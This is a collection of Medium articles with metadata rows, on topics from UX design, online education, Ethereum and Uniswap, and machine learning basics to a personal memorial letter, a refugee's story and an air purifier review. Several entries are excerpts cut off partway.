Defining the structure is often a key deliverable for content designers involved on these projects. Articulating how decisions about the structure of a system affect an overall experience is another important UX opportunity. Think about the data used and what you want the feature or product to do. This will help you make decisions about how to organize the inputs you’re working with. It also makes it easier to plan how you might help people understand how these systems work.
Output
Ultimately, the structure results in an output that should solve a user problem. At Shopify, we define outputs to do things like:
Help a merchant find apps
Recommend actions
Provide business insights about their store
We should be mindful of how well our outputs help people solve the problem we’re focusing on. Think about how to create a flexible structure that can respond to feedback about the quality of the outputs.
Part of our UX practice is thinking about the different possible paths through an experience. For invisible UX, that includes accounting for the different responses people might have to the output they receive. It also includes accounting for the different kinds of output that a system will define. Documenting and preparing for both of these helps us plan for how to represent the outputs on the UI.
Interface
Usually, people use an output by interacting with it on the UI. How the output gets represented on the interface depends on what problem is being solved. If the output helps someone find something they’re searching for, then it will likely look different from an output that’s recommended to someone because it’s related to their interests. The same output could be represented in different places throughout a product. The context for where the output is being shown also affects how we represent it in the UI.
How and where an output is represented depends on what the system and product are designed to do. Applying UX thinking to every component in a system helps us to frame those systems on the interface.
Working on an invisible UX project
To explain what this looks like when it’s applied, let’s talk about Shopify’s native search. This is offered to all merchants on Shopify with an online store.
An example of Shopify’s native search on an online store.
Over a year ago, we started with a search experience that didn’t account for errors or spelling mistakes. Customers had to use exact terms to get results — a near impossible task for a user who might not know what they’re searching for, or who is visiting a store for the first time.
We were also dealing with a search system that doesn’t really have a taxonomy. Our fields for product titles, tags, product type, and collections are free form and merchants use these fields in different ways, depending on their industry, size, and needs.
We started with trying to understand what users expect from search. We audited everything from library searching to different ecommerce platforms, as well as segmenting different types of searchers. We learned that merchants interact with search in so many different ways, depending on where they are in their purchase journey. This helped set some of the foundational UX guidelines for
What inputs need to be part of the structure
How flexible this structure needs to be in terms of relationships and logic
What that structure should output
As with any project, scope was important. We needed to define what the system should and shouldn’t support — Do we need to include all the available store data? Should it display recommendations or alternatives? These UX questions helped establish what the feature needs to do and what needs to be part of the system.
How the invisible UX framework was applied to storefront search.
Experimentation can begin
Once we’d mapped out the current system, we were ready to start exploring and experimenting.
We experimented with a few different things:
Logic
Resources
Attributes
Hierarchy
Ranking
Relationships
What should the relationship between attributes and search functionalities be? Do we need to create different relationships for different attributes? In what conditions do these relationships apply?
Because we had broken down the system into our framework, we were able to pinpoint where in the system we needed to tweak something when the interface didn’t produce the experience that we wanted. Without this it would have made these different layers, conditions, and functions really confusing to keep track of.
All of these questions were answered by the UX team — but the answers didn’t show up on the interface as noticeable design elements. As you can see, we haven’t mentioned field size, or buttons, or labels. Our solutions were — invisible.
Last but not least, one of the most important tasks that we did as a team was to align on definitions and terminology. We sat together with data and development, mapping out the important parts of the system, identifying the terms, aligning on what they meant, and where they would affect the user journey, UI, and related user tasks. By doing this, we were able to find more merchant-friendly terms and communicate more efficiently as a team.
Familiar tactics for new problems
Invisible UX projects often address a new kind of problem. But even for new problems, design thinking can contribute to crafted solutions through structure, definition, and establishing context. Using a framework helped us understand our contributions as designers working on invisible UX because it made the work more tangible. Thinking about our product as a system made of pieces with names and functions gives us a better way to communicate and collaborate with our teammates, and it helps us connect our decisions to the problems and user experience we’re working on. Frameworks are another familiar design tactic that works to make sense of these new problems too. Try it out. Find the invisible UX in your products and use a framework to help you understand how you might contribute to designing the user experience in these often overlooked spaces. | https://ux.shopify.com/designing-for-invisible-ux-5d92a2b4bf59 | ['Evija Sundman'] | 2020-12-09 16:11:59.780000+00:00 | ['Systems Thinking', 'Content Design', 'UX', 'Design Thinking', 'Content Strategy'] |
How coronavirus is going to change education forever | IMAGE: Marina Shemesh on Flickr (CC — BY SA)
I particularly enjoyed this story about how some people are using videos of themselves paying attention, which they then play on a loop, so they can do other things while supposedly attending a meeting or class over the net. I couldn’t help smiling at the thought of my students listening to me in the background “just in case” I call them, while they are playing games or texting friends. What’s more, this is a ruse that wouldn’t be so hard to pull off: even the small jump that the restart of the loop would generate would be practically imperceptible and would likely be confused with a simple glitch or connection fault.
Fortunately, I am privileged to teach students whose attention span matches the money they have paid for their education and the selection process they have gone through. Our relationship is based on trust: they want to be taught as productively as possible under the present circumstances, and I want the same, to teach in the best way possible under those circumstances.
In some cases, particularly in courses where I use the old (about to be retired) Adobe Connect for delivery, it’s clear that interaction suffers. What we usually do is have the teacher speak while students watch on camera and share the screen with our presentations; students ask their questions or answer the teacher’s through the chat (they could use the microphone, but it’s clumsy). When we use more advanced tools, such as WoW in a Box or, in the case of other universities, Zoom, GoToMeeting, Webex, Google Classroom or similar, interaction is better and teachers can see the faces of their students, allow them to ask questions when they raise their hand virtually and, with practice, the experience is quite comparable to a classroom. In other cases, particularly programs that were designed for distance learning, interaction continues to be through asynchronous forums with constant moderation by the teacher (this week I am teaching one such group) and, occasionally, using video conferencing.
The differences are evident, and they raise a fundamental question: is online education just a substitute for online teaching, or are we already at a point where it could be considered comparable or even a better experience? The answer is complex. When students have expectations of face-to-face training, if the substitute for an emergency is proposed as an interaction through a forum or a platform with limitations, satisfaction levels drop, because there is an apparent gap in those expectations, and students may prefer to postpone their course and wait for normal service to resume. If the substitution is carried out with a tool rich in interaction, this happens less often.
However, there is another component, which is why IE University’s online courses are among those that generate the greatest satisfaction based on student feedback: the forum format (supplemented with some opportunities for personal interaction and others for online conferences via interactive video) tends to be much richer than a face-to-face environment. I know this sounds counter-intuitive, but it’s something I’ve been testing for a very long time, bearing in mind that my first experiences in online environments were no less than twenty years ago: while students can only participate in a class discussion for a minute or two at best (before classmates get impatient), and they must do so out loud based on their ability to think on their feet, in an asynchronous online environment they can participate whenever they want, take time to collect their thoughts, and even include other resources such as links to articles or videos. The result, from a relatively simple learning curve, is more in-depth discussions and better opportunities for learning.
Many institutions call online education the simple development of self-administered tools, content in which students progress through exercises and occasionally undergoing assessment tests. This methodology, which may be sufficient for certain subjects, corresponds to a completely different concept, where the teacher’s role is minimal, or is even replaced by tutors who answer questions more or less mechanically. This is a completely different product, which is not necessarily bad — as long as it meets the expectations of the student who enrolled in it, satisfaction may be high — that generally tends to have single figure achievement percentages: it is perfectly normal for only 2% or 3% of those initially enrolled to end up consuming all of the available course content.
A period of confinement like the present should be the time to consider experiments, to test tools and to try to provide our students with the best possible experience, comparable to the expectations we generated when they started their programs. If we are not able to do this, we will not be able to move on to the next phase, which will undoubtedly start after the lockdown: that all courses are developed simultaneously face-to-face and online, so that students can, at any time, decide whether to attend a class in person or follow it — with the right level of interaction — via the web when, for example, they have flu or any other potentially contagious disease. Whether we are talking about a class or an exam, the challenge is moving smoothly between a face-to-face and a virtual platform, without this impacting negatively on the learning experience.
I sincerely believe this will be the next phase, if only because we are going to be very wary for some time of anybody with the slightest cough. If we think the present situation is an exception and that, after quarantine, everything will return to how it was before, I think we are wrong. Education is one of the most important challenges, it will surely change after this episode (with all that this entails in terms of opportunity for those who know how to deal with it properly), and it will be essential for institutions to be up to speed. | https://medium.com/enrique-dans/how-coronavirus-is-going-to-change-education-forever-bf41dadfed5d | ['Enrique Dans'] | 2020-03-31 09:46:50.837000+00:00 | ['Education', 'Online Learning', 'Ie University', 'Online Education', 'Coronavirus'] |
Life of a Designer Through Funny Memes | It’s year-end and it is a fun time of the year. We have all been stressed enough during the entire 2020 and it is time we should leave the past and welcome the new year with all fun and excitement. In today’s blog post, I am sharing a collection of funny web design memes hoping to tickle the funnier side of our regular designer’s lives. So let’s laugh out loud and enjoy. | https://medium.com/nyc-design/life-of-a-designer-through-funny-memes-18257210e91c | ['Akbar Shah'] | 2020-12-28 06:36:31.274000+00:00 | ['UX Design', 'UI Design', 'Web Design', 'Design', 'New York'] |
Easy Database Access | Get more citations to your research
by enabling easier access to research,
and get more credit for your work.
Blackcoffer handles the maintenance, updates, hosting, etc.,
so your research is easier to understand
and gets cited more often.
We reduce the friction in publishing research
by making it easy to play with data.
| https://medium.com/data-analytics-and-ai/easy-database-access-2305dd48c00c | ['Ella William'] | 2019-06-11 06:10:12.524000+00:00 | ['Analysis', 'Data Science', 'Data', 'Information Technology'] |
Smart Contract Platforms & Ethereum’s Dominance | Ethereum dominated the crypto market in 2017 as the smart contract platform of choice for ICOs and blockchain projects. In 2017, over 95% of projects decided to run their token sale and/or build their decentralized application using Ethereum’s ERC20 standard (or some form of it).
While Ethereum clearly has the first-mover advantage, it seems to be slowly losing support from dApp developers in favor of newer, faster, more feature-rich smart contract platforms. Its flaws are becoming clearer as the crypto market matures, with scalability being a hot topic in 2018. A significant number of commercial-grade decentralized applications require higher throughput — the capacity to process more transactions per second (TPS). While an Ethereum smart contract is a decent tool for raising funds via an ICO, it is less than satisfactory when it comes to running and deploying apps. In a nutshell, Ethereum is slow and requires expensive gas fees paid by the end user, making the smart contract platform landscape ripe for disruption.
This graphic shows how Ethereum is losing market share to its competitors over time in 2018:
Interestingly enough, it does not seem that another smart contract is directly cannibalizing Ethereum or “winning” the race to have the most adoption and/or development activity. Instead, other smart contract platforms are designing their features to cater to specific use cases, while Ethereum markets itself as “featureless.” Therefore, for the time being, the smart contract platform ecosystem appears to not be a winner take all market. Ethereum is still the clear market leader, and there are a great deal of resources and documentation available for developers to get started programming in Solidity, which gives Ethereum its edge over competition.
Out of 3,928 ICOs launched in the last 18 months, 91% of them have used Ethereum to run their token sale. Furthermore, 3.1% of ICO projects have opted to build their own blockchain.
Data from icoalert.com
Behind Ethereum, the platform with the second most ICOs is the Waves platform. Waves finds its niche by being quick, low cost and easy to use; an ICO can be run on its platform without the need for technical know-how. Furthermore, Waves helps address the liquidity problem with its built-in decentralized exchange.
Stellar has the third most ICO traction and caters to financial applications by allowing cheap and fast value transfer. Not far behind in fourth and fifth place are NEO and EOS. NEO has gained popularity in Asia due to its scalability and support for many programming languages. EOS, which launched its main-net in June, boasts new features such as readable account names, hacked account recovery, and more. EOS has fewer nodes in its system which makes it arguably less decentralized than Ethereum, but much more scalable. EOS is also the largest ICO in history, raising over $4 billion in its year-long token sale.
EOS, NEO, Waves, and Stellar all have the ability to scale to hundreds (if not thousands) of transactions per second, compared to Ethereum’s approximate 10 tx/s currently. However, what Ethereum lacks in scalability it makes up for in decentralization(and security). Similar to Bitcoin, anyone can become an Ethereum miner, and every node is required to process every transaction.
In conclusion, Ethereum now has some very real competition with the introduction of new consensus mechanisms and governance models. This does not mean Ethereum is destined to fail, however, it must adapt in order to survive in this dynamic market. Ethereum is currently evolving to include emerging concepts to solve the scaling dilemma such as plasma, sharding, and the Casper protocol. Will Ethereum be able to implement these improvements in time? Or is the Ethereum killer out there lurking? Only time will tell.
An interesting note — all of this software is open source; each project can easily copy features (such as readable account names) from others. However, consensus models and governance structures are fundamental changes in the protocol, and are NOT easily copied without starting from scratch.
For a more in depth analysis on competing smart contract platforms, check out my colleague Peter Keay’s articles here. | https://medium.com/ico-alert/ico-insights-ep-1-smart-contact-platforms-ethereums-dominance-662c11083c10 | ['Joseph Argiro'] | 2018-11-10 23:45:34.584000+00:00 | ['News', 'Smart Contracts', 'Articles', 'Blockchain', 'Ethereum'] |
Uniswap Complements Decentralized Exchanges | Uniswap achieved a transaction volume of $28,000,000 in the last 24 hours. According to CoinMarketCap, this number is around half of Gate.io ($54,000,000) and one-third of Bitfinex ($84,000,000). With such a high volume of daily transactions, Uniswap is indeed more popular than most decentralized exchanges.
Let me give you a brief introduction on Uniswap first. We have several keywords: Constant product, automatic market-making, censorship-free token-listing, token-to-token swap.
Unlike the pending order mechanism adopted by most exchanges, Uniswap uses a token-to-token swap method. How many B tokens can a certain amount of token A exchange for depends on the proportion and quantity of the two tokens that liquidity providers injected to the liquidity pool.
Exchange rates for an ERC20 token are calculated based on an equation: x * y = k.

The exchange rate of a token will always be at a particular point lying on the resulting curve of this equation.

k is a constant value that never changes, whereas x and y represent the quantities of Token A and Token B available in a particular exchange, which ultimately determine the exchange rate.
Any user can contribute to liquidity pools for any ERC20 token, and therefore gain commissions in the form of exchange fees for doing so, with a certain degree of risk of course. It’s worth mentioning that Uniswap does not charge any fee throughout the process.
If you want Uniswap to support the trading between two tokens, you achieve so by creating a liquidity pool and add tokens to it, which is completely permissionless.
For example, I created a liquidity pool for ETH and ABC, and put 10 ETH and 1000 ABC in it. Now the exchange rate of ETH and ABC follows 100 ABC = 1 ETH. If a trader wants to swap 5 ETH for ABC, then according to the Constant Product Principle,

10 * 1000 = (10 + 5) * (1000 - X)

X stands for the quantity of ABC the trader will get, which is about 333 in this case. Now there are 15 ETH and 667 ABC in the liquidity pool, and the price of ABC has risen to about 44 ABC = 1 ETH.
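The swap above can be sketched in a few lines of Python (a simplified illustration of the constant-product rule only; fees are ignored):

```python
def constant_product_swap(pool_a: float, pool_b: float, amount_in: float) -> float:
    """Amount of token B received for selling amount_in of token A into the pool,
    holding pool_a * pool_b constant (fees ignored for simplicity)."""
    k = pool_a * pool_b
    return pool_b - k / (pool_a + amount_in)

# The example from the text: a 10 ETH / 1000 ABC pool, trader swaps in 5 ETH.
abc_out = constant_product_swap(10, 1000, 5)
print(round(abc_out))                      # ~333 ABC received
print(round(1000 - abc_out))               # ~667 ABC left in the pool
print(round((1000 - abc_out) / (10 + 5)))  # new price: ~44 ABC per 1 ETH
```

Running the same function with a larger trade against the same pool shows the slippage growing quickly, which is exactly the liquidity problem described next.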
It’s not hard to tell that a high price slippage may occur when the liquidity is low, which is also why some tokens increased tenfold or even hundredfold in price recently.
Uniswap has the following main advantages and adoption scenarios thanks to its characteristics and utilization,
1. Very suitable for small, quick token-to-token swaps
2. Meets the needs of token issuance by small teams
3. Perfect for trades that don't require registration or authorization
4. Enriches the variety of tooling thanks to its open data
The fourth point above is quite useful and interesting. Developers can analyze data, such as every on-chain transaction, and build some rather powerful and practical DeFi DApps.
However, Uniswap has its challenges:
1. Not suitable for big transactions, as it depends heavily on liquidity and suffers high slippage.
2. Easier for bad actors to abuse, as it doesn't require any verification process.
Overall, Uniswap is an addition to decentralized exchanges, without the capability to fully replace the pending order mechanism. The two may merge into one in the near future, which is not technically complicated.

Source: https://medium.com/@tokenpocket-gm/uniswap-complements-decentralized-exchanges-8eefb7315efa (2020-07-21)
Regression Versus Classification Machine Learning: What's the Difference?

The difference between regression and classification machine learning algorithms often confuses data scientists, leading them to implement the wrong methodology for their prediction problems.
Andreybu, who is from Germany and has more than 5 years of machine learning experience, says that “understanding whether the machine learning task is a regression or classification problem is key for selecting the right algorithm to use.”
Let’s start by talking about the similarities between the two techniques.
Supervised machine learning
Regression and classification are categorized under the same umbrella of supervised machine learning. Both share the same concept of utilizing known datasets (referred to as training datasets) to make predictions.
In supervised learning, an algorithm is employed to learn the mapping function from the input variable (x) to the output variable (y); that is y = f(X).
The objective of such a problem is to approximate the mapping function (f) as accurately as possible such that whenever there is a new input data (x), the output variable (y) for the dataset can be predicted.
Here is a chart that shows the different groupings of machine learning:
Unfortunately, that is where the similarity between regression and classification machine learning ends.
The main difference between them is that the output variable in regression is numerical (or continuous) while that for classification is categorical (or discrete).
Regression in machine learning
In machine learning, regression algorithms attempt to estimate the mapping function (f) from the input variables (x) to numerical or continuous output variables (y).
In this case, y is a real value, which can be an integer or a floating-point value. Therefore, regression predictions are usually quantities or sizes.
For example, when provided with a dataset about houses, and you are asked to predict their prices, that is a regression task because price will be a continuous output.
Examples of the common regression algorithms include linear regression, Support Vector Regression (SVR), and regression trees.
Some algorithms, such as logistic regression, have "regression" in their names but are not regression algorithms.
Here is an example of a linear regression problem in Python:
import numpy as np
import pandas as pd
# importing the model
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split  # note: the original 'sklearn.cross_validation' module was removed in scikit-learn 0.20
# importing the module for calculating the performance metrics of the model
from sklearn import metrics

data_path = "http://www-bcf.usc.edu/~gareth/ISL/Advertising.csv"
# loading the advertising dataset
data = pd.read_csv(data_path, index_col=0)
array_items = ['TV', 'radio', 'newspaper']  # creating a list of the feature columns
X = data[array_items]  # choosing a subset of the dataset
y = data.sales  # sales
# dividing X and y into training and testing sets
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=1)
linearreg = LinearRegression()  # applying the linear regression model
linearreg.fit(X_train, y_train)  # fitting the model to the training data
y_predict = linearreg.predict(X_test)  # making predictions based on the testing set
print(np.sqrt(metrics.mean_squared_error(y_test, y_predict)))  # calculating the RMSE
# output gives the RMSE as 1.4046514230328955
Classification in machine learning
On the other hand, classification algorithms attempt to estimate the mapping function (f) from the input variables (x) to discrete or categorical output variables (y).
In this case, y is a category that the mapping function predicts. Given one or several input variables, a classification model will attempt to predict the value of one or several discrete outcomes.
For example, when provided with a dataset about houses, a classification algorithm can try to predict whether the prices for the houses “sell more or less than the recommended retail price.”
Here, the houses will be classified whether their prices fall into two discrete categories: above or below the said price.
Examples of the common classification algorithms include logistic regression, Naïve Bayes, decision trees, and K Nearest Neighbors.
Here is an example of a classification problem that differentiates between an orange and an apple:
from sklearn import tree

# Gathering training data
# features = [[155, "rough"], [180, "rough"], [135, "smooth"], [110, "smooth"]]  # input to classifier
features = [[155, 0], [180, 0], [135, 1], [110, 1]]  # scikit-learn requires real-valued features
# labels = ["orange", "orange", "apple", "apple"]  # output values
labels = [1, 1, 0, 0]

# Training the classifier
classifier = tree.DecisionTreeClassifier()  # using a decision tree classifier
classifier = classifier.fit(features, labels)  # find patterns in data

# Making predictions
print(classifier.predict([[120, 1]]))  # output is [0], for apple
Wrapping up
Selecting the correct algorithm for your machine learning problem is critical for the realization of the results you need.
As a data scientist, you need to know how to differentiate between regression predictive models and classification predictive models so that you can choose the best one for your specific use case.
Do you have any comments or questions?
Please post them below.

Source: https://medium.com/quick-code/regression-versus-classification-machine-learning-whats-the-difference-345c56dd15f7 (Dr. Michael J. Garbade, 2018-08-11)
How can you achieve assured results from your market research initiatives?

A common misconception among many business owners is that just because you're employing market research, you've got it right! However, what is of utmost importance here is how well you conduct the research and what you do with the intelligence you find. Employing market research is only half the battle won!
In order to win the whole battle and take the victory leap, you have to make a one-hundred-percent effort to derive the best possible, most accurate data from your research initiatives. Taking minute details into consideration across the process is a good step to begin with.
The following are a few simple ways to make your market research process and result-derivation highly effective.
1- Clearly define your scope: First things first, before venturing into anything, clearly lay down the objectives of the research, the process, and what you intend to achieve out of it. Give your activities a tangible touch-point; it can be your target audience or your potential competitors. Having a clearly defined process from the start will accelerate the results in the right direction.
2- Ask the right questions: Too often in research, the right people are asked the wrong questions, or unimportant ones. Make a fine mix of quantitative and qualitative questions for your audience. Make it easy for them to answer. And most importantly, make sure that when the answers come in as a whole, they add up to something useful for you to look at.
3- Make the process simpler for the respondents: Get one thing straight: the simpler the process is, the more easily you'll get answers out of your respondents. Therefore, see to it that the research and data-gathering funnel is very simple, easy to access, time-effective, and uncomplicated for the respondents.
4- Follow up: Lastly, when the data has come in and is being processed, don't overlook the follow-up. Extend your thanks for respondents' valuable time and make them feel appreciated. This paves a smoother way for upcoming research funnels. You can also engage with them later on the progress of the survey they were a part of. After all, it's all about engaging with your customers, isn't it?

Source: https://medium.com/@ibigrs123/how-can-you-achieve-assured-results-from-your-market-research-initiatives-82f8c1fbb8 (Ibi Global Research Solutions, 2021-12-23)
Dear Uncle Scott,

Hey, it's Julianne. Grace and Fred Ho's daughter? I mostly go by J now, though.
When I was little, I was part of a play group. The play group was an excuse for our parents to hang out, really; they’d have house parties, there’d be food, there were other kids, and the parents would play games and laugh and laugh and laugh. As I got older, I stopped going. But from when I was young, too young to actually remember how old I was, I remember my Uncle Scott.
Uncle Scott was, frankly, an amazing guy. He didn’t have kids, but if we got restless, he would be the one to wrestle with all seven or eight of us. He’d listen to our plans to storm the upstairs bedroom and take it from the younger kids, and cross his heart that he wouldn’t tell them about our Nerf guns. He was a great friend to our parents, but we just knew he was a great friend to us, and I loved him like family.
Uncle Scott had brain cancer. Honestly, that might not have been it; we were too young to be told, really, what was going on. I don’t remember when he left, either. For some reason, I thought he’d moved to Florida. No idea who told me that. As a little kid does, I assumed he was coming back, and then after a while I stopped remembering to ask about him. It was only in the last few years that it occurred to me that he must’ve died.
A year after a very different death, many years after I saw you last, I asked my mom about you. She told me that you moved to Michigan to be closer to your parents. I guess your father died while you were there, and pretty soon you were in hospice and you went too. I don’t know when, but I guess really soon after you left. Wish I could remember when that was.
She was really surprised, you know. I guess Justin doesn’t remember you, but I think that he must. Maybe not your name, but I don’t think he could forget your presence. I’ll be real though, even though I think I can recall your face, I’m never really sure if it’s quite right.
A lot has changed, but why wouldn’t it? Auntie Teresa and Uncle Sanford got a divorce, that family with tons of kids is expecting their tenth (but I guess they wouldn’t have been that huge when you knew them). We still went to the Pongs’ for a few years after you, but I stopped going as I got older and busier. Kinda regret that now.
Justin, Nathan, and I went to college this year! I haven’t talked to them in a while, but Justin is going to Northeastern and Nathan is going to UC Santa Barbara in the fall. There’s this thing called COVID-19 that’s keeping everyone home, so I’m not sure if they actually went or not.
A long time after I lost touch with them, I threw myself into a sport, of all things. I’m playing Division 2 basketball now, and I’m proud to say that I love it just as much now as I did when I could barely run a lap, maybe even more so. If we weren’t chin-deep in a world-wide pandemic, I would’ve wanted you at some of my games.
All in all, I'm not sure why I wrote this. There's no way that I can catch you up on years and years of major life events that you've had to miss. I guess this is my way of saying goodbye, now that I know that I should've all that time ago (but how would I have known? I was 6). I hope, that despite everything, you left happy. I hope you left knowing that you were loved, and that you are remembered. I hope that you still laugh as much as you used to. Goodbye Uncle Scott, I'll see you again sometime.

Source: https://medium.com/@julianne-h14/dear-uncle-scott-d50ead213aad (Julianne Ho, 2020-12-18)
"I don't want my children to be talking to WFP in 25 years"

Hinda was born in eastern Ethiopia 25 years ago to Somali parents. Violence in Somalia prompted them to seek shelter across the border. Hinda has never set foot inside Somalia. She's never left the Somali region where her parents settled. She's an animated woman with an answer for everything who grins every time she looks into the eyes of her eight-month-old daughter Sumaya.
But when I ask her about her ambitions and hopes for Sumaya, she pauses, looks down and says:“I want to go home, but I don’t know where that is.”
Hoping it’s not forever
I met Hinda sheltering from the noon sun at one of two distribution points in Kebribayah refugee camp. Established in 1991, it’s the oldest camp in Ethiopia and is home to 15,000 refugees, mostly Somali. She’s been receiving food assistance from the World Food Programme (WFP) for as long as she can remember. It has become a source of stability and familiarity in her life.
Noticing that she hadn’t got any food with her yet she was at the back of a distribution centre, I ask her why she was there. She explains that her allocated day was tomorrow but she attended today because the centre is a social hub for mothers in the camp.
Sumaya clings to her mother as Hinda explains: “I grew up on WFP food, and now her family is doing the same. I hope it’s not forever — I don’t want my children to be talking to WFP in 24 years.”
Only option to survive

Source: https://medium.com/world-food-programme-insight/i-dont-want-my-children-to-be-talking-to-wfp-in-25-years-8f9a916d39aa (Edward Johnson, 2020-01-17)
Coway Airmega 150 review: a compact air cleaner

The Airmega 150 deviates quite a bit from the last couple of Coway air purifiers we've reviewed. Compact and low-key, it eschews smart tech for easy operation and a sub-$200 price tag and removes pollutants from your indoor air with minimal noise and fuss.
The Airmega 150 has a slim, unfussy design. Measuring 13.4 x 6.5 x 18.5 inches (WxDxH) and weighing a hair over 12 pounds, it comes in white and sage green finishes with little adornment. Its space-saving size makes it easy to slot into any room without having to rearrange the furnishings.
Despite its compactness, it provides 214 square feet of coverage, making it perfect for medium-sized rooms and small apartments. It has a Clean Air Delivery Rate (CADR) of 138 for smoke, 161 for dust, and 219 for pollen. These rates reflect the purifier's effectiveness in removing the respective indoor air pollutants based on room size and the volume of clean air produced per minute, with higher CADR numbers indicating increased effectiveness.
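To put those CADR figures in perspective, a CADR rating can be converted into rough air changes per hour for a given room. The sketch below is a back-of-the-envelope calculation, not Coway's methodology; it assumes the CADR is expressed in cubic feet per minute and that the room has an 8-foot ceiling:

```python
def air_changes_per_hour(cadr_cfm, floor_area_sqft, ceiling_ft=8.0):
    """Rough air changes per hour implied by a CADR figure (in cubic feet per minute)."""
    room_volume_cuft = floor_area_sqft * ceiling_ft
    return cadr_cfm * 60.0 / room_volume_cuft

# Smoke CADR of 138 across the Airmega 150's rated 214 square feet of coverage:
print(round(air_changes_per_hour(138, 214), 1))  # -> about 4.8 changes per hour
```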
(Image: Coway) The compact, minimal design fits well in any room.
The purifier uses a three-stage filtration system: a pre-filter that captures large dust particles, mold, and pet and human hair; a deodorizing filter; and a Green True HEPA filter that removes pollutants and allergens such as pollen. The “true” indicates the HEPA filter’s efficiency; in this case, the ability to capture up to 99.97 percent of 0.3 micron particles.
Real-time readings are conveyed through a color-coded air quality indicator on the purifier’s control panel. A blue reading means the air quality is “good,” and degrading air quality is indicated by green, yellow, and then red. The system works well enough for providing at-a-glance reports, but you must walk over to the unit whenever you want to check in, and you obviously can’t check the air status from another room. That’s not a big deal for most use cases, but if you want to use the purifier in a baby’s nursery or another situation where you don’t want to disturb the room’s occupant, the lack of a companion app for remote monitoring and control could be a significant drawback.
The flip side is that without the need to pair the purifier to an app, the setup is extremely easy. You just need to remove the front cover, take out the filters and remove them from their packaging, then arrange them in sequence and close the cover.
(Image: Coway) The Airmega 150 displays the current air quality reading via a color-coded LED on its control panel.
The Airmega 150 has three fan speeds plus an Auto mode that optimizes the speed setting based on current air quality. These are controlled by a single button that cycles through the Auto/1/2/3 settings in order until the appropriate indicator lights up. While the lowest manual setting is virtually inaudible, Coway says the fan speed noise level ranges from 19.98 to 48.3 dB.
I used the Airmega 150 in the downstairs level of my condominium. Leaving it in the auto setting allowed me to see how the purifier responded to changing conditions. The air quality indicator glowed blue as soon as I turned the purifier on and stayed that way unless someone stirred up dust or was cooking. Then the fan automatically kicked into higher speeds as the air quality light dropped down through green, yellow, and red levels and ran until the level was back in the “good” zone.
The air-quality sensor, which determines the pollution level and adjusts the fan accordingly, is set to standard sensitivity by default. I found that adequate in my testing. If the air quality stays at the poorest level for more than two hours or reads “good” for more than one hour but just doesn’t seem clean, you can adjust the monitoring sensitivity. You do this by simultaneously pressing the power and fan-speed buttons for two seconds, then pressing the speed button until the speed indicator light glows for the desired sensitivity: 1 for “high,” 2 for “standard,” 3 for “low.”
(Image: Coway) The pre-filter can be easily removed for bi-monthly cleaning through an open slot.
As with any air purifier, keeping the Airmega 150 in top condition is critical for accurate monitoring. That means regularly cleaning the air quality sensor and maintaining the filters, in particular. The sensor is easily accessed behind a removable cover on the right side of the purifier and requires cleaning every two months with a soft brush or vacuum cleaner. The pre-filter, which can be removed through its slot without removing the purifier’s front cover, should be cleaned every two weeks with a vacuum or water depending on how much debris has built up. The deodorizing and HEPA filters need to be replaced every six months and annually respectively. There are separate LED indicators for each of these two filters that light up when they reach the end of their lifecycle to ensure you don’t forget.
Overall, I found the Airmega 150 a pretty ideal air purifier for modest-sized spaces. Its minimalist design blends with any decor, and it is intuitive to operate right out of the box. While it doesn't offer app control or integrate with other smart appliances, it also doesn't have any of the attendant connectivity and interoperability hassles. And it accurately monitors and responds to changing air conditions, so you're always breathing your best. That's plenty to recommend it.
Note: When you purchase something after clicking links in our articles, we may earn a small commission. Read our affiliate link policy for more details.

Source: https://medium.com/@robin54832608/coway-airmega-150-review-a-compact-air-cleaner-5c80227e93e0 (2020-12-07)
Need to innovate faster? Embrace learning as a business imperative
“In times of change, learners inherit the earth; while the learned find themselves beautifully equipped to deal with a world that no longer exists.” Eric Hoffer
Image by Joshua Sortino
By Amy Marshall
We were already in a time of rapid change in organizations, and then COVID-19 massively forced even more change, literally overnight. It has been awe-inspiring to see what speed in innovation and problem-solving is possible with a clear, unifying north star and a burning platform, even if that platform is survival. We learned a lot, and workers have been forced to flex and stretch their skills in new and uncomfortable ways to meet demands.
We can come out of this crisis stronger than ever — more creative, more resilient, more human. But crisis is not without its costs, as workers have been forced to manage unprecedented levels of personal and professional stress. It has taken a human toll (see COVID-19 workplace stress from the CDC), and the only thing we know for sure is that constant change will continue to be rapid and persistent. We will need to continue to learn and innovate our way out of this crisis. How can we do this in an accelerated way, without burning our people out, and sustain it as we emerge from crisis mode into a more “steady state” of still constant change?
To drive innovation and embrace rapid change, learning, now more than ever, needs to be viewed and prioritized as a strategic business imperative. Organizations need to invest in continuous employee learning and building it into the organization’s DNA. Teams need to identify and advocate for their unique needs to achieve critical business priorities. And individuals need to embrace and proactively drive their own personalized learning needs to suit their current and future role requirements and professional goals.
What and why of innovation?
Innovation (as compared to invention, according to Webster’s), means a new idea, method, or device, a novelty or the introduction of something new. It can feel like an overused buzz word or too big to define or reserved only for a R&D group. But in high-performing organizations, it is an outcome attainable for any level employee, on any day. It can be as big as a new business model or a large-scale product development, or as seemingly small as a novel feature to add to a system or a new process to more effectively run key meetings.
With this ever-increasing pace of change and disruption, new skills and novel ways of staying ahead of the competition and meeting customer needs will only become more important. Only 60 of the companies from the 1955 Fortune 500 list were still in business in 2017 (fewer than 12 percent), indicating the rapid pace of change and the need for re-invention. We are in the fourth industrial revolution, and increasing automation of repetitive, low-cognitive tasks will require people to rapidly develop higher-level cognitive and digital skills to remain employable.
The ability to embed continuous learning, at the organizational, team, and individual level (not just the skills and knowledge themselves, but the ability to continuously learn, and to do so rapidly), is needed.
1. Learning at the organizational level
Learning for innovation requires investment, but has tangible ROI. IBM’s Smarter Workforce Study in 2013 revealed that 84% of employees in the best performing organizations are receiving the training they need, a full 68% better than worst performing companies. Microsoft just announced a major investment highlighting the burning platform for digital skills (especially data analytics, cloud, and software development) countering the decline of employer-funded training in the early 2000’s and stagnation since 2008. There may be an economic downturn now, but as organizations emerge and talent mobility picks back up, employees whose organizations invested in their development will not just perform better, but will also be more loyal (LinkedIn 2018 Workplace Learning: 94% would stay longer if their company invested in their career).
Learning for innovation needs to be built into an organization’s operating model, with specific designs for learning outcomes. To be successful, any people-related strategies (including learning) should always be rooted in the business strategy to drive which capabilities are needed for the workforce. This should be translated into a learning strategy that guides design of the operating model — (the processes, technology, tools, people, skills, practices, accountabilities, rewards, and culture needed to execute on the learning strategy. Since business strategies must be agile to meet ever-changing business needs, the learning operating model will also require agility and feedback built in to enable fast response.
Source: Slalom
